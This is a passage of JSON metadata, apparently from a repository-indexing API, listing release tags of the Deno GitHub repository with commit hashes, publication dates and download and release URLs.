07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencie